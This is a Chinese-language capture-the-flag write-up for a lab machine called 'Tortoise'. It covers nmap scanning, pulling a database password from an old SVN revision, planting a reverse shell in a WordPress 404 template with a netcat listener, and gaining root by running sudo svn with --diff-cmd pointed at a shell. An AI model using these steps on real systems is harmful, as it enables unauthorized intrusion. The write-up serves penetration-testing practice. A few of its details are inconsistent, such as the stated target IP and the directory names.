Mazesec_Tortoise

靶机来源：QQ群-660930334

难度：Easy

一、信息收集

1、主机探测

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24                                         
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-29 12:36 +0800
Nmap scan report for 192.168.2.1
Host is up (0.00047s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00044s latency).
MAC Address: 08:00:27:8E:AB:36 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.63
Host is up (0.00070s latency).
MAC Address: 08:00:27:6F:93:5E (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 7.54 seconds

靶机IP：192.168.2.70

2、端口扫描

1.全端口扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.63                            
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-29 12:36 +0800
Nmap scan report for 192.168.2.63
Host is up (0.00057s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3690/tcp open  svn
MAC Address: 08:00:27:6F:93:5E (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 9.50 seconds

开放端口：22、80、3690

2.详细信息扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p22,80,3690 192.168.2.63
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-29 12:37 +0800
Nmap scan report for 192.168.2.63
Host is up (0.00059s latency).

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 10.0 (protocol 2.0)
80/tcp   open  http     nginx
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-title: Tortoise
3690/tcp open  svnserve Subversion
MAC Address: 08:00:27:6F:93:5E (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4)
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.16 seconds

3.udp扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sU --top-ports 100  192.168.2.63                        
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-29 12:37 +0800
Nmap scan report for 192.168.2.63
Host is up (0.00065s latency).
All 100 scanned ports on 192.168.2.63 are in ignored states.
Not shown: 59 closed udp ports (port-unreach), 41 open|filtered udp ports (no-response)
MAC Address: 08:00:27:6F:93:5E (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 58.74 seconds

二、服务枚举与漏洞发现

1、HTTP 服务枚举

访问80端口，是一个网站，同时暴露出域名tortoise.dsz 找到登录框，需要账号和密码才能进行登录

2、SVN服务

Subversion 是一个集中式 版本控制系统，在管理项目的当前和历史数据方面发挥着至关重要的作用。作为一个 开源 工具，它在 Apache 许可证 下运行。该系统因其在 软件版本控制和修订控制 方面的能力而广受认可，确保用户能够高效地跟踪随时间变化的更改。 默认端口： 3690 根据在网站上面找到的账号和密码，以及svn服务默认的存在的账号和密码，找到下列的几对账号密码

harry = harryssecret
sally = sallyssecret
lily = lilyssecret

harry = harryssecret
sally = sallyssecret
cathy = cathyspassword
lily = lilyssecret

查看根目录的内容，找到一个config.php

┌──(root㉿kali)-[~]
└─# svn list svn://192.168.2.63/config.php
认证领域: <svn://192.168.2.63:3690> ec4c0778-aa1a-4bbf-a472-8cba06d4e45c
“harry”的密码: ************

config.php

┌──(root㉿kali)-[~]
└─# svn list svn://192.168.2.63/config.php
认证领域: <svn://192.168.2.63:3690> ec4c0778-aa1a-4bbf-a472-8cba06d4e45c
“harry”的密码: 

认证领域: <svn://192.168.2.63:3690> ec4c0778-aa1a-4bbf-a472-8cba06d4e45c
用户名: sally
“sally”的密码: ************

config.php

导出文件内容

┌──(root㉿kali)-[~/miaosec]
└─# svn export svn://192.168.2.63/config.php ./config.php
认证领域: <svn://192.168.2.63:3690> ec4c0778-aa1a-4bbf-a472-8cba06d4e45c
“sally”的密码: ************

┌──(root㉿kali)-[~/miaosec]
└─# cat config.php  
db_user=getenv('DB_USER');\ndb_pass=getenv('DB_PASS');

重新查看提交日志

┌──(root㉿kali)-[~/miaosec]
└─# svn log -v svn://192.168.2.63                      
认证领域: <svn://192.168.2.63:3690> ec4c0778-aa1a-4bbf-a472-8cba06d4e45c
“sally”的密码: ************

------------------------------------------------------------------------
r2 | root | 2026-01-23 20:13:55 +0800 (五, 2026-01-23) | 1 行
改变的路径: 
   M /config.php

Remove hardcoded credentials for security
------------------------------------------------------------------------
r1 | root | 2026-01-23 20:13:54 +0800 (五, 2026-01-23) | 1 行
改变的路径: 
   A /config.php

Initialize database config
------------------------------------------------------------------------

导出原始的文件内容

┌──(root㉿kali)-[~/miaosec]
└─# svn export -r 1 svn://192.168.2.63/config.php ./config_r1.php
认证领域: <svn://192.168.2.63:3690> ec4c0778-aa1a-4bbf-a472-8cba06d4e45c
“sally”的密码: ************

A    config_r1.php
完成导出。

找到账号和密码：admin:S3cret_P@ss_2026

┌──(root㉿kali)-[~/miaosec]
└─# cat config_r1.php 
db_user='admin'\ndb_pass='S3cret_P@ss_2026'

三、获取shell

使用账号和密码，成功进入到管理后台

直接在主题-编辑主题文件-404文件添加反弹shell的命令

访问不存在的页面，成功获取到shell

┌──(root㉿kali)-[~/miaosec]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.63] 41855
id
uid=101(nginx) gid=102(nginx) groups=82(www-data),102(nginx),102(nginx)

四、权限提升

1、获取onehang权限

查看文件，在localhost里面找到.backup.php，发现一个凭证1006b3921

ls -la
total 12
drwxr-xr-x    2 root     root          4096 Jan 26 21:23 .
drwxr-xr-x    5 root     root          4096 Jan 26 21:24 ..
-rw-r--r--    1 root     root          1723 Jan 26 21:23 .backup.php
cat .backup.php
<?php
define('SECURE_KEY', '1006b3921');

final class BackupManager {
    private string $root;
    private string $destination;
....

同时在/home目录找到用户名onehang

ls -la /home
total 12
drwxr-xr-x    3 root     root          4096 Jan 23 20:09 .
drwxr-xr-x   21 root     root          4096 Jan 29 12:31 ..
drwxr-sr-x    2 onehang  onehang       4096 Jan 23 22:01 onehang

经过测试，发现成功进行登录：onehang:1006b3921

┌──(root㉿kali)-[~]
└─# ssh onehang@192.168.2.63
onehang@192.168.2.63's password: 
              _                          
__      _____| | ___ ___  _ __ ___   ___ 
\ \ /\ / / _ \ |/ __/ _ \| '_ ` _ \ / _ \
 \ V  V /  __/ | (_| (_) | | | | | |  __/
  \_/\_/ \___|_|\___\___/|_| |_| |_|\___|
                                         
Tortoise:~$ id
uid=1001(onehang) gid=1001(onehang) groups=1001(onehang)

2、获取root权限

查看sudo -l

Tortoise:~$ sudo -l
[sudo] password for onehang: 
Matching Defaults entries for onehang on Tortoise:
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

Runas and Command-specific defaults for onehang:
    Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"

User onehang may run the following commands on Tortoise:
    (ALL : ALL) /usr/bin/svn
PWD_PATH=$(pwd)
svnadmin create "$PWD_PATH/toroot"
svn checkout "file://$PWD_PATH/toroot"
cd toroot2
touch play
svn add play
sudo svn diff --diff-cmd /bin/sh play
nano toroot.sh
chmod +x toroot.sh
cat toroot.sh
sudo svn add toroot.sh
sudo /usr/bin/svn diff --diff-cmd /home/onehang/toroot2/toroot.sh /home/onehang/toroot2/play